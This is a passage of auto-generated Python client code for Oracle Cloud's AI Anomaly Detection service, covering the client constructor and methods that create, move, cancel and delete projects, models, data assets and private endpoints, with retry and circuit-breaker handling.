The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
need to specify a service endpoint.
:param timeout: (optional)
The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
:type timeout: float or tuple(float, float)
:param signer: (optional)
The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
provided in the config parameter.
One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
:type signer: :py:class:`~oci.signer.AbstractBaseSigner`
:param obj retry_strategy: (optional)
A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
Any value provided at the operation level will override whatever is specified at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
:param obj circuit_breaker_strategy: (optional)
A circuit breaker strategy to apply to all calls made by this service client (i.e. at the client level).
This client will not have circuit breakers enabled by default, users can use their own circuit breaker strategy or the convenient :py:data:`~oci.circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY` provided by the SDK to enable it.
The specifics of circuit breaker strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/circuit_breakers.html>`__.
:param function circuit_breaker_callback: (optional)
Callback function to receive any exceptions triggerred by the circuit breaker.
"""
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20210101',
'service_endpoint_template': 'https://anomalydetection.aiservice.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False),
'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
self.base_client = BaseClient("anomaly_detection", config, signer, ai_anomaly_detection_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def cancel_work_request(self, work_request_id, **kwargs):
"""
Cancel work request with the given ID.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/cancel_work_request.py.html>`__ to see an example of how to use cancel_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"cancel_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def change_ai_private_endpoint_compartment(self, ai_private_endpoint_id, change_ai_private_endpoint_compartment_details, **kwargs):
"""
Moves a resource into a different compartment. When provided, 'If-Match' is checked against 'ETag' values of the resource.
:param str ai_private_endpoint_id: (required)
Unique private reverse connection identifier.
:param oci.ai_anomaly_detection.models.ChangeAiPrivateEndpointCompartmentDetails change_ai_private_endpoint_compartment_details: (required)
Details for the target compartment.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_ai_private_endpoint_compartment.py.html>`__ to see an example of how to use change_ai_private_endpoint_compartment API.
"""
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_ai_private_endpoint_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
def change_data_asset_compartment(self, data_asset_id, change_data_asset_compartment_details, **kwargs):
"""
Changing the compartment of a data asset.
:param str data_asset_id: (required)
The OCID of the Data Asset.
:param oci.ai_anomaly_detection.models.ChangeDataAssetCompartmentDetails change_data_asset_compartment_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_data_asset_compartment.py.html>`__ to see an example of how to use change_data_asset_compartment API.
"""
resource_path = "/dataAssets/{dataAssetId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_data_asset_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"dataAssetId": data_asset_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_data_asset_compartment_details,
response_type="DataAsset")
def change_model_compartment(self, model_id, change_model_compartment_details, **kwargs):
"""
Moves a Model resource from one compartment to another. When provided, If-Match is checked against ETag values of the resource.
:param str model_id: (required)
The OCID of the Model.
:param oci.ai_anomaly_detection.models.ChangeModelCompartmentDetails change_model_compartment_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_model_compartment.py.html>`__ to see an example of how to use change_model_compartment API.
"""
resource_path = "/models/{modelId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_model_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"modelId": model_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_model_compartment_details)
def change_project_compartment(self, project_id, change_project_compartment_details, **kwargs):
"""
Moves a Project resource from one compartment to another. When provided, If-Match is checked against ETag values of the resource.
:param str project_id: (required)
The OCID of the Project.
:param oci.ai_anomaly_detection.models.ChangeProjectCompartmentDetails change_project_compartment_details: (required)
The details to change the compartment of the project.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_project_compartment.py.html>`__ to see an example of how to use change_project_compartment API.
"""
resource_path = "/projects/{projectId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_project_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"projectId": project_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_project_compartment_details)
def create_ai_private_endpoint(self, create_ai_private_endpoint_details, **kwargs):
"""
Create a new private reverse connection endpoint.
:param oci.ai_anomaly_detection.models.CreateAiPrivateEndpointDetails create_ai_private_endpoint_details: (required)
The information used to create the private reverse connection.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_ai_private_endpoint.py.html>`__ to see an example of how to use create_ai_private_endpoint API.
"""
resource_path = "/aiPrivateEndpoints"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_ai_private_endpoint_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_ai_private_endpoint_details)
def create_data_asset(self, create_data_asset_details, **kwargs):
"""
Creates a new DataAsset.
:param oci.ai_anomaly_detection.models.CreateDataAssetDetails create_data_asset_details: (required)
Details for the new DataAsset.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_data_asset.py.html>`__ to see an example of how to use create_data_asset API.
"""
resource_path = "/dataAssets"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_data_asset_details,
response_type="DataAsset")
def create_model(self, create_model_details, **kwargs):
"""
Creates a new Model.
:param oci.ai_anomaly_detection.models.CreateModelDetails create_model_details: (required)
Details for the new Model.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Model`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_model.py.html>`__ to see an example of how to use create_model API.
"""
resource_path = "/models"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_model got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_model_details,
response_type="Model")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_model_details,
response_type="Model")
def create_project(self, create_project_details, **kwargs):
"""
Creates a new Project.
:param oci.ai_anomaly_detection.models.CreateProjectDetails create_project_details: (required)
Details for the new Project.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/create_project.py.html>`__ to see an example of how to use create_project API.
"""
resource_path = "/projects"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_retry_token",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"create_project got unknown kwargs: {!r}".format(extra_kwargs))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
header_params=header_params,
body=create_project_details,
response_type="Project")
def delete_ai_private_endpoint(self, ai_private_endpoint_id, **kwargs):
"""
Deletes a private reverse connection endpoint by identifier.
:param str ai_private_endpoint_id: (required)
Unique private reverse connection identifier.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
